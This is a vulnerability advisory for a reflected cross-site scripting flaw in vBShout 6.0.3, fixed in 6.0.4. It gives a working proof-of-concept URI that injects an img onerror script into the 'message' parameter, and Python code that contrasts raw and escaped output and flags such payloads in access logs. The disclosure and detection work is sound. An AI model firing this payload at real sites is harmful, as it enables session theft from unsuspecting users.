vBShout 'vbshout.php' Cross Site Scripting Vulnerability
BID:52714
Info
| Bugtraq ID: | 52714 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 26 2012 12:00AM |
| Updated: | Mar 26 2012 12:00AM |
| Credit: | Avram Marius Gabriel |
| Vulnerable: | DragonByte Technologies vBShout 6.0.3 |
| Not Vulnerable: | DragonByte Technologies vBShout 6.0.4 |
Discussion
vBShout is prone to a reflected cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data: the 'message' parameter submitted to the archive search in 'vbshout.php' (do=archive) is reflected into the response without adequate HTML encoding.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
vBShout versions prior to 6.0.4 are vulnerable.
Exploit / POC
To exploit this issue, an attacker must entice an unsuspecting user to follow a malicious URI.
The following example URI is available. The 'message' value closes the quoted attribute it is reflected into ("&gt;) and then injects an &lt;img&gt; element whose onerror handler runs script; src=1 and onerror= are separate attributes, so the space between them is required:
http://www.example.com/vbshout.php?message="><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>&username=&hours=&from[month]=0&from[day]=&from[year]=0&end[month]=0&end[day]=&end[year]=0&chatroomid=0&orderby=DESC&perpage=5&s=&do=archive&instanceid=1
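The mechanism behind the PoC, as an added example that is not vBShout's or DragonByte's code: a hypothetical stand-in for the archive-search form (the real vbshout.php template is not on this page) reflects the 'message' parameter once raw and once HTML-encoded, a small start-tag scanner shows which version ends up with an element carrying an event handler, and a log check picks the PoC request out of constructed Apache access-log lines. FORM, render_vulnerable, render_fixed, handler_tags, flag_archive_xss and the log lines are all assumptions made for the example.

```python
"""Added example, not vBShout's code: why the reflected 'message' parameter
becomes XSS, what output encoding changes, and how to spot the PoC request in
web-server logs.  FORM is a hypothetical stand-in for the archive-search form
that vbshout.php?do=archive re-fills with the submitted terms."""
import html
import re
from urllib.parse import parse_qs, urlsplit

# PoC URI from the advisory, on one line (src=1 and onerror= are separate attributes).
POC_URI = ('http://www.example.com/vbshout.php?message="><textarea><!-- </textarea>'
           '<img src=1 onerror=alert("XSS")>&username=&hours=&chatroomid=0'
           '&orderby=DESC&perpage=5&s=&do=archive&instanceid=1')
PAYLOAD = '"><textarea><!-- </textarea><img src=1 onerror=alert("XSS")>'

def query_param(uri, name):
    """Percent-decoded value of one query parameter ('' if absent)."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return params.get(name, [''])[0]

# Hypothetical form: the injection point is a double-quoted attribute value,
# which is why the payload opens with "> to close it.
FORM = '<form><input type="text" name="message" value="{value}"></form>'

def render_vulnerable(message):
    """Reflects the raw parameter into the attribute (the pre-6.0.4 behaviour)."""
    return FORM.format(value=message)

def render_fixed(message):
    """Encodes for the attribute context; quote=True also encodes \" and '."""
    return FORM.format(value=html.escape(message, quote=True))

def handler_tags(page):
    """Names of start tags in `page` that carry an on* event-handler attribute.
    A minimal scanner that honours quoted attribute values, so an encoded payload
    sitting inside value="..." is not mistaken for markup.  End tags and
    comments are skipped."""
    found, i, n = [], 0, len(page)
    while (i := page.find('<', i)) >= 0:
        i += 1
        if not page[i:i + 1].isalpha():          # </end>, <!-- ... -->, stray '<'
            end = page.find('>', i)
            i = n if end < 0 else end + 1
            continue
        j = i
        while j < n and (page[j].isalnum() or page[j] in '-:'):
            j += 1
        tag, i = page[i:j].lower(), j
        while i < n and page[i] != '>':           # attribute list
            if page[i].isspace() or page[i] == '/':
                i += 1
                continue
            j = i
            while j < n and not page[j].isspace() and page[j] not in '=>/':
                j += 1
            name, i = page[i:j].lower(), j
            while i < n and page[i].isspace():
                i += 1
            if i < n and page[i] == '=':          # attribute value
                i += 1
                while i < n and page[i].isspace():
                    i += 1
                if i < n and page[i] in '"\'':    # quoted: runs to the matching quote
                    close = page.find(page[i], i + 1)
                    i = n if close < 0 else close + 1
                else:                             # unquoted: runs to whitespace or '>'
                    while i < n and not page[i].isspace() and page[i] != '>':
                        i += 1
            if name.startswith('on'):
                found.append(tag)
        i += 1
    return found

# Constructed Apache combined-log lines; line 1 is the PoC request, percent-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Mar/2012:10:15:02 +0000] "GET /vbshout.php?message=%22%3E'
    '%3Ctextarea%3E%3C!--%20%3C/textarea%3E%3Cimg%20src=1%20onerror=alert(%22XSS%22)'
    '%3E&username=&do=archive&instanceid=1 HTTP/1.1" 200 5123',
    '198.51.100.4 - - [26/Mar/2012:10:16:40 +0000] "GET /vbshout.php?message=hello'
    '+world&username=&do=archive&instanceid=1 HTTP/1.1" 200 4870',
    '198.51.100.9 - - [26/Mar/2012:10:17:05 +0000] "GET /forumdisplay.php?f=2 HTTP/1.1" 200 30211',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'<\w|"\s*>|\bon\w+\s*=', re.I)   # tag open, attribute break-out, handler

def flag_archive_xss(log_lines):
    """(line number, decoded message) for vbshout.php?do=archive requests whose
    'message' parameter looks like markup rather than search terms."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m or '/vbshout.php' not in m.group('target'):
            continue
        if query_param(m.group('target'), 'do') != 'archive':
            continue
        message = query_param(m.group('target'), 'message')
        if MARKUP_RE.search(message):
            hits.append((lineno, message))
    return hits

if __name__ == '__main__':
    print(handler_tags(render_vulnerable(PAYLOAD)), handler_tags(render_fixed(PAYLOAD)))
    print(flag_archive_xss(SAMPLE_LOG))
```

The scanner is deliberately a start-tag tokenizer rather than Python's HTMLParser: HTMLParser does not treat textarea as raw text, so it would read the payload's `<!--` as a comment and hide the injected element, which is not what a browser does. The log check decodes the request before matching, since the payload arrives percent-encoded; matching the raw request line for `<img` would miss it.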
Solution / Fix
Solution:
Updates are available: DragonByte Technologies has released vBShout 6.0.4 as a security release. Please see the references for details.
References
References:
- vBActivity / vBShout / Forumon RPG / vBDownloads / vBQuiz Updates (Security Rel (DragonByte Technologies)
- vBShout Homepage (DragonByte Technologies)
- vBShout v6.0.4 (Security Release) (DragonByte Technologies)